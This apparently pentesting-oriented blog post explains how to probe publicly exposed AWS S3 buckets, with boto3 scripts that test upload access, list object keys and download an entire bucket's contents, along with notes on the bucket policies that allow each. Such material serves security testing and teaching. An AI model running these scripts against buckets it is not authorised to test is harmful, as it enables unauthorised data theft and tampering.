Attacking AWS Part 1: Public S3 Buckets

This post focuses on the public exposure of S3 buckets. Testing was done using boto3 over the AWS CLI on Python v3.12. An AWS IAM user account with any level of permissions, on any account, is required for testing. We'll start by assuming you've managed to enumerate bucket names within a client AWS account. The three scenarios below focus on Put, List and Get based bucket permissions. The target bucket uses the default encryption method, SSE-S3. I may cover the key permissions required for KMS at a later point.



It may be possible to place whatever data you'd like into a target bucket if the bucket policy allows "s3:PutObject" access. Say we've come across an open bucket named 'zuph-pub'. We can test the ability to write a local file named data.txt to this bucket with the following snippet:

    import boto3

    s3 = boto3.resource('s3')
    bucket = s3.Bucket('zuph-pub')

    try:
        bucket.upload_file('data.txt', 'data.txt')
        print("File uploaded successfully")
    except Exception as e:
        print("Upload failed:", e)

If successful, the following should be relayed back to your console of choice:



This is possible because the bucket policy permits "s3:PutObject" actions for any AWS IAM identity. Here's the example policy used on the target 'zuph-pub' bucket:


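For readers who can't see the screenshot, a policy of this kind can be sketched as a Python dictionary. This is an assumed shape, not a copy of the policy shown above: the helper name `public_bucket_policy` and the `Sid` values are hypothetical, and the wildcard principal is inferred from the bucket being described as open to any identity. One detail that is easy to get wrong is the resource: object-level actions such as "s3:PutObject" and "s3:GetObject" apply to the object ARN (`arn:aws:s3:::bucket/*`), while "s3:ListBucket" applies to the bucket ARN itself.

```python
# Actions that apply to the bucket itself rather than to the objects inside it.
BUCKET_LEVEL_ACTIONS = {"s3:ListBucket"}


def public_bucket_policy(bucket_name, actions):
    """Build a bucket policy document allowing `actions` for any principal.

    Hypothetical helper for illustration only; the wildcard principal and
    the Sid values are assumptions, not taken from the original policy.
    """
    bucket_arn = f"arn:aws:s3:::{bucket_name}"
    bucket_actions = sorted(a for a in actions if a in BUCKET_LEVEL_ACTIONS)
    object_actions = sorted(a for a in actions if a not in BUCKET_LEVEL_ACTIONS)

    statements = []
    if bucket_actions:
        statements.append({
            "Sid": "PublicBucketLevel",
            "Effect": "Allow",
            "Principal": "*",
            "Action": bucket_actions,
            "Resource": bucket_arn,  # bucket-level actions target the bucket
        })
    if object_actions:
        statements.append({
            "Sid": "PublicObjectLevel",
            "Effect": "Allow",
            "Principal": "*",
            "Action": object_actions,
            "Resource": f"{bucket_arn}/*",  # object-level actions target keys
        })
    return {"Version": "2012-10-17", "Statement": statements}
```

Passing the result of `public_bucket_policy("zuph-pub", ["s3:PutObject"])` through `json.dumps` gives a document of the kind you would expect to find on a bucket that is writable by anyone.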

The next scenario covers data exfiltration from public-facing S3 buckets. We can obtain the file and directory names using the "s3:ListBucket" permission alone. How significant such a finding is depends on what the listing reveals. Here's an example query, again using boto3:

    from boto3 import client

    conn = client('s3')

    # 'Contents' is absent when the bucket is empty, so default to an empty list
    for key in conn.list_objects(Bucket='zuph-pub').get('Contents', []):
        print(key['Key'])

Running the code above on a public-facing bucket with only "s3:ListBucket" defined in the bucket policy generates the following output:


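A single `list_objects` call returns at most 1,000 keys, so larger buckets need pagination. The following is a minimal sketch using boto3's paginator for `list_objects_v2`. The function name `iter_bucket_keys` is hypothetical, and the client is passed in as a parameter so the helper can be exercised without credentials.

```python
def iter_bucket_keys(s3_client, bucket_name):
    """Yield every object key in the bucket, following pagination.

    `s3_client` is expected to be a boto3 S3 client, for example the
    object returned by boto3.client("s3").
    """
    paginator = s3_client.get_paginator("list_objects_v2")
    for page in paginator.paginate(Bucket=bucket_name):
        # 'Contents' is missing from a page that holds no objects.
        for obj in page.get("Contents", []):
            yield obj["Key"]
```

Iterating over `iter_bucket_keys(boto3.client("s3"), "zuph-pub")` and printing each key should produce the same kind of listing as above, without stopping at the first page of results.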

Here's the associated bucket policy within AWS:

The last one I wanted to cover is "s3:GetObject", which permits the retrieval of data residing in a bucket. We'll focus on grabbing all the data listed in our ListBucket example above. It's critical to note that "s3:GetObject" alone won't let you dump the whole bucket, because the script has to list the keys before it can fetch them. Both "s3:ListBucket" and "s3:GetObject" permissions must be present for this to work:

    import boto3
    import os

    bucket_name = "zuph-pub"
    s3 = boto3.client("s3")
    objects = s3.list_objects(Bucket=bucket_name)["Contents"]

    for s3_object in objects:
        s3_key = s3_object["Key"]
        path, filename = os.path.split(s3_key)
        if len(path) != 0 and not os.path.exists(path):
            os.makedirs(path)
        if not s3_key.endswith("/"):
            download_to = path + '/' + filename if path else filename
            s3.download_file(bucket_name, s3_key, download_to)

This will download all content while maintaining the directory structure of the bucket.


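The path handling in the download loop can be isolated into a small pure function, which makes it easier to reason about and test. The sketch below is a variant under stated assumptions, not the script above: `local_path_for_key` and its `dest_dir` parameter are hypothetical names, it uses `posixpath` because S3 keys use forward slashes, and it also skips keys that would resolve outside the download directory, a check the original script does not perform.

```python
import os
import posixpath


def local_path_for_key(s3_key, dest_dir="."):
    """Map an S3 key to a local file path under dest_dir.

    Returns None for "directory" placeholder keys (those ending in "/")
    and for keys that would escape dest_dir, such as "../evil.txt".
    """
    if not s3_key or s3_key.endswith("/"):
        return None
    # Normalise with POSIX rules and drop leading slashes so the result
    # is always relative to dest_dir.
    normalised = posixpath.normpath(s3_key).lstrip("/")
    if normalised in ("", ".", "..") or normalised.startswith("../"):
        return None
    return os.path.join(dest_dir, *normalised.split("/"))
```

A download loop built on this would skip any key for which the function returns None, call `os.makedirs(os.path.dirname(path), exist_ok=True)` for the rest, and then pass the path to `download_file`.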

Here's the associated bucket policy within AWS:

And here's a snippet that downloads a known object by name from a target public bucket when only the "s3:GetObject" permission exists:

    import boto3

    s3 = boto3.resource('s3')
    s3.Bucket('zuph-pub').download_file('data.txt', 'data.txt')

Hopefully you found this little dump of knowledge useful. I'll be releasing a part 2 soon!